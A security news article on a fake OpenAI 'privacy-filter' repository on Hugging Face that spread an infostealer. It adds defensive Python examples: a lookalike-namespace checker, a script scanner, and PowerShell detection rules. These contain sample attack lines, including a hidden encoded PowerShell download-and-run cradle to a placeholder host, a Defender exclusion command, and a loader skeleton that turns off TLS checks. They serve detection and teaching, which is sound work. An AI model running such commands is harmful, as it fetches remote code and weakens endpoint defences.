Fake OpenAI Repository on Hugging Face Distributed Advanced Infostealer Malware Through a Typosquatting AI Project Campaign
Malicious AI Repository Impersonated OpenAI’s Privacy Filter Project and Delivered Credential Theft Malware to Windows Users Through Hugging Face Downloads
OVERVIEW
Cybersecurity researchers have uncovered a malicious repository hosted on Hugging Face that impersonated a legitimate OpenAI project in order to distribute advanced infostealer malware to Windows users.
The malicious repository, named “Open-OSS/privacy-filter,” reportedly reached the top trending position on Hugging Face before being removed. During its exposure window, the repository accumulated approximately 244,000 downloads, although researchers believe some download activity may have been artificially inflated.
The campaign demonstrates how threat actors are increasingly abusing trusted AI and machine learning ecosystems to distribute malware through fake repositories, typosquatting, and deceptive open-source projects.
HOW THE ATTACK WORKED
Researchers discovered that the malicious repository copied the appearance and documentation of OpenAI’s legitimate Privacy Filter release almost verbatim.
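A lookalike can copy a README and a model card, but it cannot copy the repository ID, so the namespace is the first thing worth checking before anything is downloaded. The following is an added example, not code from the page, from Hugging Face, or from the researchers: it pins known project names to their official publisher namespace and warns when a namespace merely resembles one. The publisher table is an assumption made for the demonstration (the page does not give the official repository ID of OpenAI's Privacy Filter), and the 0.6 similarity threshold is a chosen value. It also serves recommendation 1 (verify repository authenticity) later in the page.

```python
"""Publisher pinning for Hugging Face repository IDs (added example)."""
import difflib
import re

# ASSUMPTION for this demonstration: project name -> namespace that publishes it.
# The page names the project (OpenAI's Privacy Filter) but not its official repo ID.
OFFICIAL_PUBLISHERS = {"privacy-filter": "openai"}


def _norm(s):
    """Lowercase and drop separators so 'Privacy_Filter' and 'privacy-filter' compare equal."""
    return re.sub(r"[-_.\s]", "", s.lower())


def check_repo_id(repo_id, official=OFFICIAL_PUBLISHERS, lookalike_threshold=0.6):
    """Return (ok, reasons) for a 'namespace/name' repository ID.

    ok is False when the name matches a pinned project but the namespace is
    not its publisher, or when the namespace merely resembles a publisher
    (difflib ratio >= lookalike_threshold, a chosen value meant for triage).
    """
    namespace, sep, name = repo_id.partition("/")
    if not sep or not namespace or not name:
        return False, ["malformed repository id, expected namespace/name"]
    reasons = []
    expected = {_norm(k): v for k, v in official.items()}.get(_norm(name))
    if expected is not None and _norm(namespace) != _norm(expected):
        reasons.append(f"project '{name}' is published by '{expected}', not '{namespace}'")
    for publisher in set(official.values()):
        if _norm(namespace) == _norm(publisher):
            continue
        ratio = difflib.SequenceMatcher(None, _norm(namespace), _norm(publisher)).ratio()
        if ratio >= lookalike_threshold:
            reasons.append(f"namespace '{namespace}' resembles publisher '{publisher}' (ratio {ratio:.2f})")
    return not reasons, reasons


if __name__ == "__main__":
    for rid in ("Open-OSS/privacy-filter", "openai/privacy-filter", "someone/unrelated-model"):
        ok, why = check_repo_id(rid)
        print(f"{rid}: {'ok' if ok else 'BLOCK'} {why}")
```

A lookalike hit is a reason for a human to look, not a verdict on its own; the hard rule is the first one, a pinned project name appearing under a namespace that is not its publisher. The table only protects projects you have pinned, so it belongs in the same place as your dependency allowlist and gets updated when a new high-profile release appears.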
The fake project shipped a Python script named loader.py that read like ordinary AI helper code. Hidden inside it was a delivery mechanism that fetched and executed further payloads on Windows systems.
The attack chain included:
- Fake AI project impersonation
- Typosquatting of a legitimate repository
- Hidden malware loader functionality
- PowerShell-based payload execution
- Privilege escalation
- Deployment of a Rust-based infostealer
The malicious loader disabled SSL certificate verification (so the staging server could present any certificate), decoded the staging URL from a Base64 string embedded in the script, and downloaded a JSON document that carried a PowerShell command.
That command ran the next stage in a hidden PowerShell process, so the victim saw no console window or prompt.
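As an added example (not the page's code and not the loader itself), here is the kind of static scan a reviewer can run over a script pulled from a repository before executing it. It parses the file with Python's ast module and flags the behaviours the paragraph above attributes to loader.py: SSL verification turned off, a Base64-decoded blob, a remote fetch, and a PowerShell launch. Both sample scripts are constructed for this demonstration, and the suspicious one uses placeholders rather than a real URL or payload.

```python
"""Static indicator scan for a loader-style Python script (added example)."""
import ast
from dataclasses import dataclass, field

# Constructed sample 1: ordinary PII redaction, what a privacy-filter repo should contain.
BENIGN_SAMPLE = r'''
import re, json

SSN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

def redact(text):
    return SSN.sub("[REDACTED]", text)

def load_config(path):
    with open(path) as f:
        return json.load(f)
'''

# Constructed sample 2: the shape the page attributes to loader.py, with the
# Base64 blob and payload replaced by placeholders so it cannot fetch anything.
SUSPICIOUS_SAMPLE = '''
import ssl, json, base64, subprocess, urllib.request

ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("<base64 blob omitted>").decode()
payload = json.loads(urllib.request.urlopen(url).read())
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-NoProfile",
                  "-EncodedCommand", payload["cmd"]])
'''

FETCH_CALLS = {"urllib.request.urlopen", "urlopen", "requests.get", "requests.post"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
              "subprocess.check_output", "os.system", "os.popen"}
# PowerShell switches that hide the window or smuggle the command in.
PS_FLAGS = {"-windowstyle", "hidden", "-w", "-noprofile", "-nop", "-encodedcommand",
            "-enc", "-e", "-executionpolicy", "-ep", "bypass"}


@dataclass
class ScanResult:
    findings: set = field(default_factory=set)
    powershell_flags: list = field(default_factory=list)


def _dotted(node):
    """'ssl._create_unverified_context' for a Name/Attribute chain, '' otherwise."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def _string_literals(node):
    return [n.value for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


def scan_source(source):
    """Walk the AST once and record which loader behaviours are present."""
    result = ScanResult()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign):
            # ssl._create_default_https_context = ssl._create_unverified_context
            if (any(_dotted(t) == "ssl._create_default_https_context" for t in node.targets)
                    and _dotted(node.value) == "ssl._create_unverified_context"):
                result.findings.add("tls_verification_disabled")
        if not isinstance(node, ast.Call):
            continue
        callee = _dotted(node.func)
        if callee == "ssl._create_unverified_context" or any(
                kw.arg == "verify" and isinstance(kw.value, ast.Constant)
                and kw.value.value is False for kw in node.keywords):
            result.findings.add("tls_verification_disabled")  # also requests.get(..., verify=False)
        if callee in {"base64.b64decode", "b64decode"}:
            result.findings.add("base64_decode")
        if callee in FETCH_CALLS:
            result.findings.add("remote_fetch")
        if callee in EXEC_CALLS:
            result.findings.add("process_execution")
            literals = _string_literals(node)
            if any("powershell" in s.lower() for s in literals):
                result.findings.add("powershell_launch")
                result.powershell_flags.extend(s for s in literals if s.lower() in PS_FLAGS)
    return result


def is_loader_like(result):
    """Verdict: launches PowerShell and also hides its URL in Base64 or disables TLS checks."""
    return "powershell_launch" in result.findings and bool(
        result.findings & {"base64_decode", "tls_verification_disabled"})


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        r = scan_source(src)
        print(f"{label}: loader_like={is_loader_like(r)} findings={sorted(r.findings)} "
              f"powershell_flags={r.powershell_flags}")
```

Any one finding on its own is common in legitimate code (base64 decoding, subprocess use), which is why the verdict requires the combination; the point is to make a reviewer read the flagged lines, not to block automatically. A loader that builds names at runtime (exec on decoded strings, getattr lookups, a string-concatenated module path) will slip past a name-based scan like this, so a clean result means "nothing obvious", not "safe".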
FINAL PAYLOAD: RUST-BASED INFOSTEALER
The final malware payload, referred to as “sefirah,” was a sophisticated Rust-based infostealer designed to harvest large amounts of sensitive data from infected systems.
Data targeted by the malware included:
- Browser cookies
- Saved passwords
- Session tokens
- Browser history
- Encryption keys
- Discord tokens
- Cryptocurrency wallet data
- SSH credentials
- FTP configurations
- VPN credentials
- Wallet seed phrases
- Local sensitive files
- Multi-monitor screenshots
- System information
The malware targeted both Chromium-based browsers (Chrome, Edge and their derivatives) and Gecko-based browsers (Firefox), which covers most browser data on a Windows desktop.
Additionally, the malware reportedly added itself to Microsoft Defender's exclusion list to reduce the chance of detection and removal. Changing Defender exclusions requires administrative rights, which is consistent with the privilege-escalation step earlier in the chain.
ANTI-ANALYSIS AND EVASION TECHNIQUES
Researchers observed that the malware included extensive anti-analysis protections designed to evade sandboxes, analysts, and automated detection systems.
Anti-analysis features included:
- Virtual machine detection
- Sandbox detection
- Debugger detection
- Security tool enumeration
- Analysis environment checks
These protections allowed the malware to terminate execution or alter behavior when suspicious environments were detected, making forensic analysis more difficult.
CONNECTIONS TO OTHER MALWARE CAMPAIGNS
Investigators identified overlaps between this Hugging Face campaign and broader typosquatting operations targeting software developers and AI users.
The infrastructure used in the malicious repository reportedly shared similarities with campaigns distributing:
- NPM typosquatting malware
- WinOS 4.0 implants
- Credential-stealing payloads
- Fake open-source packages
This indicates that threat actors are increasingly focusing on software supply chain compromise and trusted developer ecosystems as malware distribution channels.
WHY THIS INCIDENT IS IMPORTANT
This incident highlights the growing security risks surrounding AI repositories, open-source platforms, and machine learning ecosystems.
AI platforms such as Hugging Face are trusted by developers, researchers, and enterprises worldwide. Consequently, malicious repositories hosted on these services can quickly gain visibility and credibility, especially when attackers imitate well-known organizations like OpenAI.
The campaign also demonstrates how threat actors are adapting traditional software supply chain attacks to AI development environments. As AI adoption continues growing, these ecosystems are becoming increasingly attractive targets for financially motivated attackers.
RISKS TO DEVELOPERS AND ORGANIZATIONS
Malicious AI repositories create significant risks for both individuals and enterprises.
Potential impacts include:
- Credential theft
- Session hijacking
- Cryptocurrency theft
- Corporate network compromise
- Developer environment compromise
- Persistent malware infections
- Supply chain infiltration
- Unauthorized access to cloud services
Because many developers execute code directly from repositories without deep verification, these attacks can spread rapidly through trusted workflows.
RECOMMENDED SECURITY MEASURES
Organizations and developers using AI repositories and open-source machine learning tools should strengthen verification and supply chain security practices.
Recommended protections include:
1. Verify Repository Authenticity
Carefully confirm publisher identity, repository ownership, and official project references before downloading code or models.
2. Avoid Blind Execution of Scripts
Never run downloaded scripts without reading them first and checking what their dependencies do. In this campaign the malicious code was in a helper script (loader.py) shipped alongside the project, so review any script a repository asks you to execute, not only the model files it hosts.
3. Use Isolated Environments
Run experimental AI models and tools inside a disposable virtual machine or container. A Python virtual environment (venv) isolates package versions, not code execution, and gives no protection against a malicious script.
4. Monitor Endpoint Activity
Deploy EDR/XDR tooling that can detect PowerShell abuse (in this chain, a Python interpreter spawning a hidden PowerShell process), infostealer behaviour, privilege escalation, changes to Defender exclusions, and suspicious outbound traffic.
5. Rotate Credentials After Exposure
Anyone who ran code from the suspicious repository should treat every secret that was on the machine as stolen and, working from a clean device rather than the infected one, immediately:
- Reset passwords
- Rotate API keys and cloud credentials
- Move cryptocurrency funds to new wallets whose seed phrases were generated on a clean machine; a seed phrase that was stored on the infected host is exposed
- Invalidate active browser sessions and revoke tokens the stealer targets (Discord, SSH, VPN)
- Reimage affected systems if compromise is suspected; rotating secrets from a still-infected host hands the new ones to the attacker
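Recommendation 4 is about catching the behaviours described earlier in the page: a Python interpreter spawning a hidden PowerShell process, and the stealer adding itself to Defender's exclusions. The following is an added example, not code from the page, from any EDR vendor, or from the campaign, of the detection rules a practitioner would write over process-creation telemetry. The events are constructed and use this example's own minimal fields rather than any product's schema. The Add-MpPreference cmdlet in the sample is the standard way to add a Defender exclusion; the page only says the stealer added itself to the exclusions, so using that cmdlet here is an assumption. PowerShell's -EncodedCommand takes Base64 of UTF-16LE text, which is what decode_ps reverses.

```python
"""Detection rules for the Python -> hidden PowerShell -> Defender-exclusion chain (added example)."""
import base64
import re

SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "node.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
DEFENDER_EXCL = re.compile(r"\b(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension|IpAddress)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|DownloadString|DownloadFile|Net\.WebClient", re.I)


def encode_ps(script):
    """Encode text the way PowerShell expects it for -EncodedCommand (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_ps(token):
    """Inverse of encode_ps; None if the token is not such a blob."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_enc_switch(tok):
    """-EncodedCommand or any of the shortened forms PowerShell accepts (-e, -ec, -enc, ...)."""
    t = tok.lower()
    return t.startswith("-") and len(t) > 1 and "encodedcommand".startswith(t[1:])


def analyze_event(event):
    """Return {'findings': set, 'decoded': str|None} for one process-creation event."""
    findings, decoded = set(), None
    parent, image, cmdline = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        findings.add("script_host_spawned_powershell")
    if HIDDEN.search(cmdline):
        findings.add("hidden_window")
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_enc_switch(tok):
            decoded = decode_ps(tokens[i + 1])
            findings.add("encoded_command" if decoded is not None else "encoded_command_undecodable")
    # Rules that look at command text see the decoded script as well as the raw command line.
    text = cmdline + ("\n" + decoded if decoded else "")
    if DEFENDER_EXCL.search(text):
        findings.add("defender_exclusion_added")
    if DOWNLOAD_CRADLE.search(text):
        findings.add("download_cradle")
    return {"findings": findings, "decoded": decoded}


def severity(findings):
    """Single rules are noisy on admin hosts; the combinations below are the chain itself."""
    if ({"script_host_spawned_powershell", "defender_exclusion_added"} <= findings
            or {"hidden_window", "encoded_command"} <= findings):
        return "high"
    return "medium" if findings else "none"


# Constructed events using this example's own fields; real telemetry has its own schema.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Users\dev\backup.ps1"},
    {"parent": "python.exe", "image": "powershell.exe",
     "cmdline": "powershell -WindowStyle Hidden -NoProfile -EncodedCommand "
                + encode_ps(r"Add-MpPreference -ExclusionPath $env:APPDATA")},
    {"parent": "python.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -enc "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s2')")},
]


def triage(events=SAMPLE_EVENTS):
    """(index, severity, sorted findings) per event, for a queue or a test."""
    results = []
    for i, event in enumerate(events):
        r = analyze_event(event)
        results.append((i, severity(r["findings"]), sorted(r["findings"])))
    return results


if __name__ == "__main__":
    for i, sev, found in triage():
        print(f"event {i}: {sev} {found}")
```

The decode step matters more than any single regex: an encoded command looks like an opaque blob in the process log, and both the exclusion change and the download cradle only become visible once it is turned back into text. Parent-process context does the rest; an administrator running PowerShell from a console is routine, a Python interpreter launching a hidden, encoded PowerShell is not.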
FINAL ANALYSIS
The fake OpenAI repository campaign demonstrates how cybercriminals are evolving beyond traditional phishing and malware delivery methods by exploiting trust within AI and developer communities.
By abusing platforms like Hugging Face and impersonating legitimate AI projects, attackers can distribute malware at scale while appearing credible to developers and researchers.
As artificial intelligence ecosystems continue expanding, organizations must treat AI repositories and machine learning supply chains as critical security boundaries requiring continuous validation, monitoring, and threat detection.